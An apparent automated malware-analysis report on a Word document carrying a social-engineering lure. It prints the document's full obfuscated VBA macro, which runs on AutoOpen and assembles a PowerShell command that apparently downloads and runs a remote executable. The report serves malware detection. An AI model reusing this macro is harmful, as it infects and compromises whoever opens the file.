MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for a potential Shell call. The document body text explicitly prompts the user to "enable editing" and "enable content" to decrypt the document, indicating a social engineering lure. The VBA script is heavily obfuscated but its presence and the heuristics suggest it is designed to execute a malicious payload.
Heuristics (6)
- ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  kfymuji = Array(qc & f & vo & dfe7 & u & q & udp & lzo6 & fb & g8 & yfs2 & c & e1 & le3 & ih5 & ic & E & ymn0 & ar & a5 & izp9 & a1 & o & w0 & xwo & pce & p8 & i6 & a & i0 & u7 & xz2 & ix0 & hhe & i & dy & o9 & cs & tw7 & d & u1 & a6 & la8 & pw8 & tz7 & y & zso & lno & qpy7 & ly3 & hmu & r5 & se & dq & lw & ly & kw & dj & pe & ssa & orr0 & jvi1 & os & x0 & us9 & dw2 & z2 & bo & l7 & enl & etq2 & w & eh9 & s & y3 & db & ad & u0 & ah & jsi8 & du1 & s4 & lsa5 & cc & pi & oj9 & rd & zt & pn & kga4 & … Shell kfymuji, dpefzosu End If
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  End Sub Sub AutoOpen() eqawp
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7944 bytes |
SHA-256 of macros.bas: 02a4144b11f2e1dc470c2f3f3bb3bb0d587f61d2cb76502de7f5de8e61d0f293
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub eqawp()
bo = Array(4062, "ile", 1774, 3857, 3725, 4838, 9775, 7817, 7773, 5086, 3376, 8847, 754, 6107)(1)
ly = Array(6478, 1013, "nT)", 8529, 7067, 7095, 9393, 6977, 9008, 591, 4071, 4119)(2)
tz7 = Array(5814, 8541, 4141, "e^c", 8178, 1258, 4495)(3)
i7 = Array(5372, 7757, 5466, 9748, "'""", 8393, 5242, 2032, 499, 4510, 6571, 2623, 4219, 6163)(4)
ly3 = Array(4070, 5563, 7729, 1618, 6453, 6692, 1492, 5653, 4909, 7734, "TEm")(10)
E = Array(3104, 7258, 609, "pOl", 2846, 190)(3)
enl = Array(9177, 3581, 6856, 6951, 8568, 233, 5798, "abi")(7)
kw = Array(9743, 2896, 9879, 7763, 7599, 7791, 3167, 1591, 1918, 2805, 9217, "^.^", 3606, 9183)(11)
jvi1 = Array(8218, "IL^", 5971, 2492, 3664, 9303, 5797, 6938, 8268)(1)
b0 = Array(296, 4701, 6582, "dAt", 3725, 9999, 2313, 6331, 5202)(3)
izp9 = Array(9583, 7604, 4320, 1200, 2742, 1385, 5900, 511, 4789, " ^B", 3703, 5440)(9)
hhe = Array(1668, 1236, 2516, 8825, 8086, "y^L", 9338, 6318, 2750, 3915, 9217, 1975, 3677)(5)
a6 = Array(6808, "^ne", 7534, 1600)(1)
o9 = Array(608, 6962, 794, 8442, " ^H", 4495, 768, 9066, 3942, 9239, 3873, 4958, 8945)(4)
l7 = Array(9965, 7073, 2312, 8598, 6187, "-ar")(5)
tw7 = Array(857, 6559, 7179, 1855, "^D^")(4)
lzo6 = Array("^ll", 4582, 7963, 9496, 8424, 4655, 2462, 5363, 1771)(0)
g8 = Array(563, 6527, 8688, "xE^", 3945)(3)
ymn0 = Array(9550, 829, 6266, "I^C", 859)(3)
dpefzosu = 0
se = Array(291, ".W^", 8064, 2289, 4084, 373, 3161)(1)
vo = Array(8505, 6903, 6784, 7547, "E /", 8015, 9489, 7157)(4)
i = Array(3829, 6639, 7843, 2305, 8412, 7220, 7934, 7532, 9974, "^e^")(9)
ad = Array(5147, "3eI", 425, 7740)(1)
le3 = Array(5750, 2337, 6786, 6437, 5921, "eC^", 3142, 5729, 2344, 1860, 3123)(5)
us9 = Array("ttp", 5693, 9304, 3609, 3546, 3937, 6157, 6035, 7447, 5438, 4459)(0)
zt = Array(9202, 1955, "aRt", 6259)(2)
i0 = Array(7986, 6644, 2746, 9808, " ^-")(4)
q = Array(5387, 8987, "wer", 2573, 9001)(2)
u0 = Array(2448, 9972, 3648, 7607, "hR.", 1460, 4021, 9934, 9685, 2982, 6391)(4)
pe = Array(4724, 1670, 1563, 3941, 5177, 747, 4072, 7213, 6899, 1298, 8643, 128, "n^L", 7433)(12)
rd = Array(9863, "sT^", 9761, 2246, 5244, 5214)(1)
pi = Array(6080, "xe'", 8731, 7232, 9604)(1)
tc0 = Array(7946, 8236, 3981, 1588, 463, 5422, 5536, 9872, "cE^", 8991, 2710, 4965, 8704)(8)
ssa = Array(3431, 3405, "O^a", 3373, 8965)(2)
u7 = Array(4409, 8590, 335, 7714, 7653, 5505, 4660, 5285, "wI^", 2559, 3022)(8)
a5 = Array(118, 793, 4833, 4757, " ", 5785)(4)
qpy7 = Array(1373, 2392, 4529, 6665, 6831, 9726, 2270, "^S^")(7)
cs = Array(9498, 1992, 6190, 5938, 8425, 763, 7849, "^Id", 4156, 8966, 6399, 7631)(7)
hmu = Array(".^n", 3893, 2308, 972, 7865, 842, 4565, 5035, 321)(0)
c = Array(9292, 6423, 8717, 7393, " -e", 7587, 5734)(4)
zy8 = Array(7046, 8098, 3773, 5750, 3500, 9176, 9804, " ", 3672)(7)
dw2 = Array(3164, 6018, 4192, 3034, 5311, "://")(5)
la8 = Array(8515, 5133, 8884, 2463, 2717, "W-o", 454, 4070, 9195, 8808)(5)
w0 = Array(2295, 4975, 903, 8472, 210, 7972, 169, " ")(7)
xz2 = Array("nDO", 831, 7252, 7348, 3477, 7060, 2893, 5842, 1494, 9653, 2640, 8332, 7257, 6949)(0)
s4 = Array(1896, "ppd", 4354, 8368, 4780)(1)
p8 = Array(8567, 1884, "^pr", 1515, 6321, 5071)(2)
ah = Array(3846, 2522, "exe", 9543, 8894, 2848)(2)
d = Array(597, 9144, 4546, 6436, 7569, 5209, 4285, 1726, 4176, "e^N", 685)(9)
r5 = Array(9454, "eT^", 9180, 3849, 2993)(1)
at0 = Array(6019, 1804, 4287, 1687, 9951, 2040, 2420, 615, 433, "SS ")(9)
u = Array(5058, 5479, 6477, 3074, 4969, 3635, 2084, 4476, 9423, 1807, 5680, "p^O", 1469)(11)
du1 = Array(7471, 430, 3392, 855, "'%A", 7459, 7516, 8148)(4)
oj9 = Array(5557, 1533, 1422, 1294, 3181, ")^;", 2133, 4247, 5098, 8239, 2818, 8201)(5)
xwo = Array(1269, 2560, 2614, 8262, 747, 7848, 1256, 9247, 7873, " ^", 7753)(9)
dy = Array(7792, 6562, 6159, 542, 477, 5377, 2417, 4054, 9953, 6439, " ")(10)
ih5 = Array(6163, 9820, 4625, 4170, "uti", 9742)(4)
dq = Array(6215, 4334, 3833, 7660, 6840, 3287, 6841, 689, 6181, 963, 9909, "Ebc")(11)
eh9 = Array(6647, 4383, 3109, 8119, 4109, 7763, "Eir")(6)
udp = Array(1114, 2523, 9053, 5983, 6058, 1137, "sHe", 459, 5482, 2845)(6)
pn = Array(6675, 8264, "^-P", 4720, 6539, 8025, 6866, 1783, 3240, 9312)(2)
f = Array(5882, 4161, ".eX", 6587, 6748, 7780, 3792, 5149, 3935, 4307)(2)
dfe7 = Array(3835, 3887, 2708, 8885, 7722, 6915, 3713, 4954, "c """, 4218)(8)
m = Array(2700, "apP", 4233, 9755, 9647, 2331, 3529, 5397, 5731, 2705, 5202, 9303, 4498)(1)
w = Array(7754, 6963, 5963, 4706, 5532, 6097, "om/")(6)
z2 = Array(1510, 7137, 8719, "eto", 5347, 3294, 4754)(3)
o = Array("ASs", 2298, 6409, 7940, 9729, 5993, 5545, 4049, 7093, 8187, 5334, 2993)(0)
i6 = Array("OfI", 4698, 7987, 5561, 3940, 1922, 8900, 9718, 4624)(0)
zso = Array(2595, 812, 2426, 8310, 9254, 6467, 6489, 513, " ^", 963, 8637, 867)(8)
qz = Array(3631, 4293, "exE", 5270, 9862, 9395, 6788, 692)(2)
etq2 = Array(2612, 7214, "a.c", 7983)(2)
jsi8 = Array(1040, 7085, 5556, 4962, 7020, "',^", 5242, 7845, 3411, 6056, 2984, 5722, 6897, 3878)(5)
lno = Array(5087, 4747, 7272, 1375, 3229, 3197, 1046, 477, 8393, "s^y", 8250, 7548, 989)(9)
ar = Array(7065, 4799, "Y^ ", 7769, 3504)(2)
ix0 = Array(8900, "wsT", 9943, 1548, 6719, 9210, 1169, 8645, 8476)(1)
pce = Array(2770, 4797, 9241, 3934, 3438, 5878, 2802, 2513, 4714, 7978, "-no")(10)
j = Array(5816, 8361, 8580, 8059, 2396, 4476, 735, "a%.", 9775, 2284, 2106, 9268)(7)
db = Array(8961, 6457, 1227, 2256, "kfI", 6019)(4)
pw8 = Array(1317, 8420, 6804, 2818, "BJ^")(4)
kga4 = Array(7173, 5093, 9713, 2791, 637, "^rO", 5449, 4870, 7213, 3714, 9490, 3752, 1739, 6356)(5)
ic = Array(3142, 6524, 2822, 8964, 9567, 8452, 1308, 1427, "^ON", 1575, 1141, 8821, 2456, 4988)(8)
y3 = Array(2883, "mq/", 9163, 7465, 5893, 7282)(1)
a = Array(2732, 3404, "le^", 9063, 5269, 6946, 7631, 7054, 8361, 3953, 2125, 6379)(2)
orr0 = Array("DF^", 9834, 4736, 8978)(0)
dj = Array(7200, "Dow", 354, 6624, 144, 9575, 3505, 4050, 8183, 2836)(1)
lw = Array(1161, "Lie", 9286, 2550, 4223, 1235, 3565, 1850, 8020)(1)
cc = Array(2497, 3519, 1475, 7177, "%.e", 3496, 6641, 5736, 1747, 810, 3053, 2017, 6206, 8570)(4)
lsa5 = Array(9569, "AtA", 1202, 8656, 9899, 4495, 9412, 7359, 2011, 7560)(1)
a1 = Array("^yP", 6277, 5234, 7169)(0)
qc = Array(3095, 5521, 1010, 9001, "cmd", 4040, 7556, 2300, 2712, 1186, 9042, 1211, 2804, 9610)(4)
uxz = Array("^'%", 9817, 3209, 3262, 432)(0)
yfs2 = Array(4328, 3771, " ", 9678, 2762)(2)
s = Array(4130, 2902, 3294, 9562, 8899, 3699, 4318, 1237, 8228, "E05", 1058)(9)
e1 = Array(876, 7275, "^X^", 6932)(2)
u1 = Array(8453, 3308, 4813, " ^(", 9211)(3)
x0 = Array(1203, 964, "^'h", 667, 3595, 4529)(2)
y = Array("t^ ", 6473, 265, 312, 4545, 1877, 9482, 5763)(0)
fb = Array(6199, 9552, 8254, 1681, 2397, 4293, 8433, 9178, 3000, 2763, ".^e", 9008, 8108)(10)
os = Array(7852, "e^(", 4632, 2647, 2588, 3610, 9281)(1)
If ActiveDocument.GridDistanceHorizontal > 0 Then
kfymuji = Array(qc & f & vo & dfe7 & u & q & udp & lzo6 & fb & g8 & yfs2 & c & e1 & le3 & ih5 & ic & E & ymn0 & ar & a5 & izp9 & a1 & o & w0 & xwo & pce & p8 & i6 & a & i0 & u7 & xz2 & ix0 & hhe & i & dy & o9 & cs & tw7 & d & u1 & a6 & la8 & pw8 & tz7 & y & zso & lno & qpy7 & ly3 & hmu & r5 & se & dq & lw & ly & kw & dj & pe & ssa & orr0 & jvi1 & os & x0 & us9 & dw2 & z2 & bo & l7 & enl & etq2 & w & eh9 & s & y3 & db & ad & u0 & ah & jsi8 & du1 & s4 & lsa5 & cc & pi & oj9 & rd & zt & pn & kga4 & tc0 & at0 & zy8 & uxz & m & b0 & j & qz & i7)(0)
Shell kfymuji, dpefzosu
End If
End Sub
Sub AutoOpen()
eqawp
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "Module3"